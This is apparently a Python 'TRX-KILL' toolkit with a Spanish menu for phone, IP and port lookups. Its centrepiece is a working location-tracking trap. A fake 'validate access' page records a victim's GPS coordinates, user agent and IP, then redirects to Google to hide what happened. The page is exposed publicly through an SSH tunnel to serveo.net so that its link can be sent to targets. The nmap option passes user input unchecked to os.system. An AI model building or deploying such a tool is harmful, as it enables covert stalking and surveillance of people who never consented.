import os, subprocess, threading, random, phonenumbers, time, requests, sys
from flask import Flask, request

app = Flask('TRX-KILL')
PUERTO = random.randint(6000, 9000)

# Lógica de procesamiento de datos real (PHP Engine emulado para tu registro)
def process_log(d):
    php_style_log = f"<?php /* REGISTRO REAL */ $d = '{d}'; ?>\n"
    with open("resultados.txt", "a") as f:
        f.write(f"--- REGISTRO REAL ---\nCOORD: {d.get('lat')}, {d.get('lon')}\nMOVIL: {d.get('ua')}\nIP: {request.remote_addr}\n----------------------\n")

HTML_ENCUESTA = """
<!DOCTYPE html>
<html><body>
    <h2>SUB-3NCU</h2>
    <button onclick="c()">VALIDAR ACCESO</button>
    <script>
    function c(){
        navigator.geolocation.getCurrentPosition((p)=>{
            fetch('/log', {method:'POST', headers:{'Content-Type':'application/json'}, body:JSON.stringify({lat:p.coords.latitude, lon:p.coords.longitude, ua:navigator.userAgent})});
            window.location.href="https://www.google.com";
        });
    }
    </script>
</body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    process_log(request.json)
    return "OK"

def banner():
    os.system('clear')
    print("\033[1;36m")
    print("   ████████╗██████╗ ██╗  ██╗     ██╗  ██╗██╗██╗     ██╗")
    print("   ╚══██╔══╝██╔══██╗╚██╗██╔╝     ██║ ██╔╝██║██║     ██║")
    print("      ██║   ██████╔╝ ╚███╔╝      █████╔╝ ██║██║     ██║")
    print("      ██║   ██╔══██╗ ██╔██╗      ██╔═██╗ ██║██║     ██║")
    print("      ██║   ██║  ██║██╔╝ ██╗     ██║  ██╗██║███████╗███████╗")
    print("      ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝     ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝")
    print("\033[1;33m      >> TRX-KILL V3.0 | OSINT REAL & PHP ENGINE <<\033[0m\n")

def main():
    while True:
        banner()
        print(" [1] OSINT REAL (NUMERO) | [2] RASTREO REAL | [3] INFO IP REAL")
        print(" [4] ESCANEO PUERTOS     | [5] BUSCADOR RRSS | [8] LEER LOGS")
        print(" [9] SALIR")
        opc = input("\nTRX-ROOT > ")
        
        if opc == "1":
            num = input("Número (Ej: +54...): ")
            p = phonenumbers.parse(num)
            print(f"[+] País: {phonenumbers.geocoder.country_name_for_number(p, 'es')}")
            print(f"[+] Operador Real: {phonenumbers.carrier.name_for_number(p, 'es')}")
            print(f"[+] Estado: {'Línea Activa' if phonenumbers.is_valid_number(p) else 'Inválida'}")
            input("\n[Enter]...")
        elif opc == "2":
            threading.Thread(target=lambda: app.run(host='0.0.0.0', port=PUERTO), daemon=True).start()
            proc = subprocess.Popen(['ssh', '-R', '80:localhost:'+str(PUERTO), 'serveo.net'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
            for line in proc.stderr:
                if "https://" in line: print(f"\nLINK REAL: {line.strip()}\n"); break
            input("Presiona Enter para cerrar..."); os.system('pkill -f ssh')
        elif opc == "3":
            ip = input("IP a analizar: ")
            data = requests.get(f"http://ip-api.com/json/{ip}").json()
            print(f"[+] Ubicación Real: {data.get('city')}, {data.get('country')}")
            print(f"[+] ISP: {data.get('isp')}")
            input("\n[Enter]...")
        elif opc == "4":
            target = input("Target: ")
            os.system(f"nmap -F {target}")
            input("\n[Enter]...")
        elif opc == "8":
            if os.path.exists("resultados.txt"): os.system("cat resultados.txt")
            input("\n[Enter]...")
        elif opc == "9": sys.exit()

if __name__ == "__main__":
    main()
